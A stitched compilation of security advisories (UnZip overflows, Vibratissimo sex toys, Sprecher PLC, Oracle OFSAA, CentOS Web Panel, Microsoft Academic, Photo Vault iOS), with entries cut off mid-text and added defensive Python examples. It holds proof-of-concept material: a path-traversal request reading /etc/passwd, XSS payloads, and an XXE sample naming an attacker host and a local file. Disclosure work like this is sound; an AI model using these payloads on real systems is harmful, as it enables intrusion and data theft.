SEC Consult Vulnerability Lab Security Advisory < 20180207-0 > === title: Multiple buffer overflow vulnerabilities product: InfoZip UnZip vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22 fixed version: 6.10c23 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133 CVE-2018-134,CVE-2018-135 impact: high homepage: http://www.info-zip.org/UnZip.html found: 2017-11-03 by: R. Freingruber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "UnZip is an extraction utility for archives compressed in .zip format (also called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our primary objectives have been portability and non-MSDOS functionality. UnZip will list, test, or extract files from a .zip archive, commonly found on MS-DOS systems. The default behavior (with no options) is to extract into the current directory (and subdirectories below it) all files from the specified zipfile." Source: http://www.info-zip.org/UnZip.html InfoZip's UnZip is used as default utility for uncompressing ZIP archives on nearly all *nix systems. It gets shipped with many commerical products on Windows to provide (un)compressing functionality as well. Business recommendation: InfoZip Unzip should be updated to the latest available version. Vulnerability overview/description: --- 1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135) InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing password protected ZIP archives. An attacker can exploit this vulnerability to overwrite heap chunks to get arbitrary code execution on the target system. 
For newer builds the risk for this vulnerability is partially mitigated because modern compilers automatically replace unsafe functions with length checking variants of the same function (for example sprintf gets replaced by sprintf_chk). This is done by the compiler at locations were the length of the destination buffer can be calculated. Nevertheless, it must be mentioned that UnZip is used on many systems including older systems or on exotic architectures on which this protection is not in place. Moreover, pre-compiled binaries which can be found on the internet lack the protection because the last major release of InfoZip's UnZip was in 2009 and compilers didn't enable this protection per default at that time. The required compiler flags are also not set in the Makefile of UnZip. Compiled applications are therefore only protected if the used compiler has this protection enabled per default which is only the case with modern compilers. To trigger this vulnerability (and the following) it's enough to uncompress a manipulated ZIP archive. Any of the following invocations can be used to trigger and abuse the vulnerabilities: >unzip malicious.zip >unzip -p malicious.zip >unzip -t malicious.zip 2) Heap-based out-of-bounds write (CVE-2018-131) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap-based out-of-bounds write if the archive filename does not contain a .zip suffix. 3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which can be used to write null-bytes out-of-bound when converting attacker-controlled strings to the local charset. 4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap out-of-bounds access vulnerability. 
5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)
This vulnerability only affects UnZip 6.1c22 (the next beta version of UnZip). InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA implementation. Various crash dumps have been supplied to the vendor, but no further analysis has been performed.
Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)
Unzipping a malicious archive results in the following output: (On Ubuntu 16.04 with UnZip 6.0, which was installed via aptitude install unzip)
SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range
We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html
SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
CVE number: -
impact: critical
homepage: http://www.vibratissimo.com
found: 2017-10-01
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more features by the app. With Vibratissimo you are open to new and exciting opportunities, whether you are in the same room or on different continents."
Source: http://www.vibratissimo.com/en/index.html
Business recommendation:
SEC Consult highly recommends updating the app to the newest version available in the app store. Furthermore, the password which was used within the app should be changed immediately. If the password was used for multiple services, all of those passwords should be changed. To get rid of issue number 3 (Unauthenticated Bluetooth LE Connections) a firmware update can be applied. To apply the firmware update the devices have to be sent to Amor Gummiwaren GmbH.
Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on the internet. Because the PHPMyAdmin interface was exposed as well, an attacker could have connected to the database and dumped the whole data set.
The dataset contains, for example, the following data:
- Usernames
- Session Tokens
- Cleartext passwords
- Chat histories
- Explicit image galleries, which are created by the users themselves
2) Exposed administrative interfaces on the internet
An administrative interface for databases was available to the whole internet without any filtering. In combination with other vulnerabilities an attacker could have gained access to the whole database and even taken over the server.
3) Cleartext Storage of Passwords
The user passwords were stored unhashed, in cleartext, in the database. An attacker who gained access to the database (e.g. via the credential disclosure) could have retrieved the plaintext passwords of users and abused their privileges in the system.
4) Unauthenticated Bluetooth LE Connections
The sex toys connect to the app without prior authentication, which is the standard use case. For example, one of the identified Bluetooth services allows reading the current device temperature. Other services which can be accessed without prior authentication are:
-) Setting the "intensity" of the current vibration pattern
-) Reading various values (temperature, etc.)
5) Insufficient Authentication Mechanism
The Android application uses a type of authentication which goes against known best practice. The username and password are sent with every request to the server to authenticate and authorise the request. There is no session management implemented. The authentication credentials are, however, transmitted via an encrypted SSL/TLS connection.
6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability allows an attacker to get access to restricted functions and resources. In this case a user is able to set a profile picture by uploading a provided image. The image is stored on the Vibratissimo server and renamed.
All images are renamed by incrementing a global number and assigning this number as the name of the image (e.g. 200.png). An attacker is therefore able to iterate through those images and dump personal user images, some of which contain explicit content. The image can even be accessed if the profile has been set to "hidden" by the user.
7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control. This feature sends a link with a unique ID to an email address or to a telephone via SMS, giving direct control of the sex toy over the internet. This wouldn't be a problem in gener
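A storage design that closes the enumeration path described in finding 6, written as an added example for this advisory (it is not the Vibratissimo backend's code); the user records, image bytes and the 20-miss alert threshold are assumptions:

```python
"""Profile image storage that cannot be walked with a counter.

Added example, not the Vibratissimo backend: finding 6 works because uploads
are renamed to a global incrementing number (200.png, 201.png, ...) and are
served without checking who asks. ImageStore names each upload with a random
token and re-checks the owner's visibility on every read; lookups of unknown
names are counted per requester so a walk over guessed names stands out.
User records, image bytes and the alert threshold are constructed/assumed.
"""
import secrets
from collections import Counter


class ImageStore:
    def __init__(self, profiles: dict):
        # profiles: owner name -> {"hidden": bool}; supplied by the caller
        self._profiles = profiles
        self._images = {}          # token -> (owner, image bytes)
        self.misses = Counter()    # requester -> lookups of unknown tokens

    def store(self, owner: str, data: bytes) -> str:
        """Save an upload under a 128-bit random name and return that name."""
        token = secrets.token_urlsafe(16)   # not derivable from earlier names
        self._images[token] = (owner, data)
        return token

    def fetch(self, token: str, requester: str):
        """Return the image if `requester` may see it, else None.

        An unknown token and a hidden-profile image owned by someone else
        both yield None, so the response does not reveal whether a guessed
        name exists.
        """
        entry = self._images.get(token)
        if entry is None:
            self.misses[requester] += 1
            return None
        owner, data = entry
        # Fail closed: an owner without a profile record is treated as hidden.
        hidden = self._profiles.get(owner, {}).get("hidden", True)
        if requester != owner and hidden:
            return None
        return data

    def suspicious_requesters(self, threshold: int = 20) -> list:
        """Requesters whose miss count suggests enumeration of image names."""
        return sorted(r for r, n in self.misses.items() if n >= threshold)


if __name__ == "__main__":
    # Constructed users: alice keeps her profile hidden, bob does not.
    store = ImageStore({"alice": {"hidden": True}, "bob": {"hidden": False}})
    alice_img = store.store("alice", b"\x89PNG-alice")
    print("bob sees alice's image:", store.fetch(alice_img, "bob") is not None)
    for n in range(200, 225):                      # the old naming scheme
        store.fetch(f"{n}.png", "mallory")
    print("flagged:", store.suspicious_requesters())
```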
SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for details)
fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
CVE number: -
impact: Medium
homepage: https://www.sprecher-automation.com
found: 2017-08-15
by: T. Weber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions. Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics."
Source: https://www.sprecher-automation.com/en/
Business recommendation:
SEC Consult recommends to immediately patch the systems and follow the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide in order to review it). A thorough security review should be performed by security professionals as further security issues might exist within the product.
Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user who is authenticated on the web interface, which is intended as a read-only interface, can download files with the permissions of the webserver (www-data). Files like "/etc/shadow" are not readable for the webserver.
2) Client-Side Password Hashing
The password hashes which are stored on the system can be used directly to authenticate on the web interface (pass-the-hash), since the password is hashed in the browser of the user during login.
3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication.
4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large number of ports triggers a denial of service of the PLC service. This results in a persistent DoS of the standby PLC in an active-standby pair. Manual operator intervention is required to restore service availability.
5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system.
Proof of concept:
-
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host:
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---
The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---
2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password.
The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We
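How a CGI handler can confine the file parameter from finding 1 to the web root, as an added example for this advisory rather than Sprecher's own code; the document root /var/www/htdocs and the file names are assumptions:

```python
"""Confine a user-supplied file name to a fixed web root.

Added example, not Sprecher Automation's code: the advisory's path traversal
works because a CGI parameter (4_1=../../../../../../../etc/passwd) is joined
onto the document root without being checked. resolve_under_root() is the
check such a handler should apply; naive_join() is the pattern behind the
finding. The web root and file names used here are assumptions.
"""
import os
import posixpath
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a requested path would leave the web root."""


def naive_join(root: str, requested: str) -> str:
    """The vulnerable pattern: decode, join, normalise, serve whatever results."""
    return os.path.normpath(os.path.join(root, unquote(requested)))


def resolve_under_root(root: str, requested: str) -> str:
    """Return the absolute path for `requested`, or raise PathTraversalError.

    1. URL-decode once (the CGI parameter arrives percent-encoded).
    2. Reject NUL bytes, backslashes and absolute paths outright.
    3. Collapse `.` and `..` with posixpath.normpath; anything that still
       starts with `..` is trying to climb above the root.
    4. Resolve symlinks on both sides with realpath and compare with
       os.path.commonpath, so `/var/www2` is not mistaken for `/var/www`.
    """
    decoded = unquote(requested)
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        raise PathTraversalError(f"rejected: {requested!r}")
    normalised = posixpath.normpath(decoded)
    if normalised == ".." or normalised.startswith("../"):
        raise PathTraversalError(f"rejected: {requested!r}")
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, normalised))
    # commonpath is a component-wise prefix test, unlike str.startswith.
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise PathTraversalError(f"rejected: {requested!r}")
    return candidate


def is_confined(root: str, requested: str) -> bool:
    """True if `requested` resolves inside `root`, False if it is rejected."""
    try:
        resolve_under_root(root, requested)
        return True
    except PathTraversalError:
        return False


if __name__ == "__main__":
    root = "/var/www/htdocs"  # assumed document root of the web interface
    for name in ("index.html", "../../../../../../../etc/passwd",
                 "..%2F..%2Fetc%2Fpasswd", "css/../index.html"):
        print(f"{name!r:40} naive={naive_join(root, name)} "
              f"confined={is_confined(root, name)}")
```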
SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
vulnerable version: 7.3.5.x, 8.0.x
fixed version: Oracle CPU January 2018
CVE number: CVE-2018-2660, CVE-2018-2661
impact: High
homepage: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
found: 2017-06-15
by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need."
Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
Business recommendation:
By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues.
Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application.
2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client-side script which will be executed in the browser of a user who visits the manipulated URL.
Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made.
http://[IP:port]/; >]>
IP:port = IP address and port where the attacker is listening for connections
Furthermore some files can be exfiltrated to remote servers via the techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to reflected cross site scripting attacks; there are many more vulnerable parameters. The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E
URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm
Vulnerable / tested versions:
-
The following version has been tested, which was the most recent one when the vulnerabilities were discovered:
* Oracle Financial Services Analytical Applications 8.0.4.0.0
According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018.
Vendor contact timeline:
2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update that includes fixes for the reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory
Solution:
-
Apply the patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin
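A parser configuration that would have refused the upload in finding 1, as an added example rather than Oracle's code; the element names and the sample documents are constructed for illustration:

```python
"""Parse an uploaded XML document while refusing DTDs and external entities.

Added example, not Oracle's code: the OFSAA "Business Model Upload" finding
(CVE-2018-2660) relies on the importer's parser honouring a DOCTYPE that
declares an external entity. parse_upload() below, built on the standard
library's expat binding, aborts on any DOCTYPE and, as a second line of
defence, on any external entity reference. The sample documents and element
names are constructed for this example.
"""
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when an upload carries a DTD or an external entity reference."""


def parse_upload(data: bytes) -> list:
    """Return [(element, text), ...] in end-tag order, or raise UnsafeXmlError."""
    parser = xml.parsers.expat.ParserCreate()
    elements, stack = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so entity declarations,
        # external subsets and entity-expansion bombs are never processed.
        raise UnsafeXmlError(f"DOCTYPE not allowed in uploads: {name}")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity not allowed: {sysid}")

    def on_start(name, attrs):
        stack.append((name, []))

    def on_chars(text):
        if stack:
            stack[-1][1].append(text)

    def on_end(name):
        tag, parts = stack.pop()
        elements.append((tag, "".join(parts).strip()))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return elements


def is_safe_upload(data: bytes) -> bool:
    """True if the document parses without a DTD or external entity."""
    try:
        parse_upload(data)
        return True
    except (UnsafeXmlError, xml.parsers.expat.ExpatError):
        return False


# Constructed samples: a benign model file and the shapes an XXE upload takes.
BENIGN_MODEL = b"<model><name>Retail</name><version>8.0.4.0.0</version></model>"
EXTERNAL_DTD = b'<!DOCTYPE model SYSTEM "http://attacker.invalid/model.dtd"><model/>'
XXE_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE model [<!ENTITY ext SYSTEM "file:///etc/hostname">]>'
    b"<model><name>&ext;</name></model>"
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_MODEL), ("external DTD", EXTERNAL_DTD),
                       ("XXE", XXE_PAYLOAD)):
        print(f"{label:13} accepted={is_safe_upload(doc)}")
```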
CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities
[Mon, 25 Apr 2016 12:32:33 GMT]
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
http://cwp.localhost:2030/
http://cwp.localhost:2030/index.php
http://cwp.localhost:2030/index.php?module=list_domains
Security Risk:
==
The security risk of the remote SQL injection web vulnerability in the CentOS Web Panel application is estimated as high. (CVSS 7.5)
Credits & Authors:
======
Vulnerability-Lab [ad...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com- ad...@evolution-sec.com Section:magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or resea...@vulnerability-lab.com) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Academic Microsoft - API Query Filter Cross Site Scripting Vulnerability
: academic.microsoft.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Referer: https://academic.microsoft.com/ Cookie: utag_main=v_id:015b543cdafd00b14436aadab8900104400390090086e$_sn:1$_ss:0$_st:1491768750447$ses_id:1491766926079%3B exp-session$_pn:2%3Bexp-session; s_norv=1491766950419-New; s_vnum=1493611200871%26vn%3D1; s_invisit=true; s_dslv=1491766950423; s_dslv_s=First%20Visit; s_ppn=mpdacad%3Aen-us%3Aregister; s_ppvl=mpdacad%253Aen-us%253Alogin%2C100%2C89%2C643%2C1355%2C621%2C1366%2C768%2C1%2CP; s_ppv=mpdacad%253Aen-us%253Aregister%2C100%2C92%2C675%2C1355%2C621%2C1366%2C768%2C1%2CP; s_fid=2DCC642E0324D787-3D30FA055450DC93; s_cc=true; s_sq=msstompdacad%3D%2526c.%2526a.%2526activitymap.%2526page%253Dmpdacad%25253Aen- us%25253Aregister%2526link%253DSign%252520up%252520with%252520Microsoft%252520account%2526region%253Dmain%2526pageIDType%253D1%2526. activitymap%2526.a%2526.c%2526pid%253Dmpdacad%25253Aen-us%25253Aregister%2526pidt%253D1%2526oid%253DSign%252520up%252520with%252520 Microsoft%252520account%2526oidt%253D3%2526ot%253DSUBMIT; AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg= -179204249%7CMCMID%7C28933220378893493633963593270039587370; MSFPC=ID=d9c52c60bfa3454780dd8fed1ee6d500=1=201704=1; msacademic=da629bfe-3e6a-4e63-8c85-d684ae83d1d6 Connection: close - Response: HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Sun, 09 Apr 2017 12:55:23 GMT Connection: close Content-Length: 230 Reference(s): https://academic.microsoft.com/ https://academic.microsoft.com/api/ https://academic.microsoft.com/api/search/ https://academic.microsoft.com/api/search/GetFilters Solution - Fix & Patch: === 2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) - Unresponsive Security Risk: == The security risk of the non-persistent 
cross site scripting web vulnerability is estimated as medium. (CVSS 3.2)
Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Lawrence Amer (http://lawrenceamer.me)
Profile: https://www.vulnerability-lab.com/show.php?user=Lawrence Amer
Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities
se of the customer (kunden) and orders (bestellungen) context listings. Parse or escape the context and disallow special chars during registration or add to prevent further script code injection attacks. The vulnerability can be resolved by an update to version 5.3.4 that is delivered by the manufacturer. The issue risk is marked as moderate.
Security Risk:
==
The security risk of the stored cross site scripting vulnerabilities in the Shopware CMS is estimated as medium. (CVSS 4.4)
Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
scape the output content of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability.
Security Risk:
==
The security risk of the client-side cross site scripting web vulnerability in the CentOS Web Panel is estimated as medium (CVSS 3.3).
Credits & Authors:
==
Benjamin Kunz Mejri (Vulnerability Laboratory) - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities
rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://localhost:2030/index.php?module=mail_add-new]
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
Connection[keep-alive]
POST-Daten:
ifpost[yes]
email_address[%3E%22%3CPAYLOAD INJECTION POINT!+src]
domain[test-domain.com]
password[%3E%22%3CPAYLOAD INJECTION POINT!+src]
Response Header:
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
PoC: POST via add Mailbox in email input
Email domain test-domain.com created.
Mailbox a"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD EXECUTION!+src>@test-domain.com created.
Create a New Email Account or Forwarder (MailBox/Forwarder)
Here you can create a new email account or forwarder.
Create a New Email Account (MailBox)
Minimize
Reference(s):
http://localhost:2030/index.php?module=mail_add-new
Solution - Fix & Patch:
===
The vulnerabilities can be patched by sanitizing the vulnerable `id` and `email address` parameters of the index.php file POST method request. Disallow usage of special chars and restrict the parameter input to prevent script code injection attacks. Filter the output error location and the item listing, the vulnerable locations where the code point occurs.
Security Risk:
==
The security risk of the application-side input validation vulnerabilities in the web application is estimated as medium. (CVSS 4.4)
Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Photo Vault v1.2 iOS - Insecure Authentication Vulnerability
Document Title:
===
Photo Vault v1.2 iOS - Insecure Authentication Vulnerability
References (Source):
https://www.vulnerability-lab.com/get_content.php?id=2110
Release Date:
=
2018-01-16
Vulnerability Laboratory ID (VL-ID):
2110
Common Vulnerability Scoring System:
4.8
Vulnerability Class:
Insecure Storage of Sensitive Information
Current Estimated Price:
1.000€ - 2.000€
Product & Service Introduction:
===
https://itunes.apple.com/us/app/id1053383947
Abstract Advisory Information:
==
The Vulnerability Laboratory core research team discovered an insecure authentication issue in the official
Vulnerability Disclosure Timeline:
==
2018-01-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=
Published
Affected Product(s):
PhotoRange
Product: Photo Vault - Mobile (Web-Application) 1.2
Exploitation Technique:
===
Local
Severity Level:
===
Medium
Technical Details & Description:
An insecure configuration vulnerability has been discovered in the official Photo Vault v1.2 iOS mobile web application. The vulnerability is located in the login mechanism and the password request communication. When wifi is activated in the app, it is possible to remotely access the protected vault (an http server) with a password. The password request is a simple, poorly protected request to the login.html file, with `_` used to split the password from the file name. There is no request limitation to block automated attacks. Attackers can quickly enumerate the password with simple automated attempts against the http basic authentication mechanism. Remote attackers can use an automated dictionary attack or a manual http brute-force attack via curl, nmap or http-brute. Attackers in the same network can quickly gain unauthorized access to the private vault over the activated wifi web application. A second, minor problem is that https is not enabled for the wifi http server communication in the network.
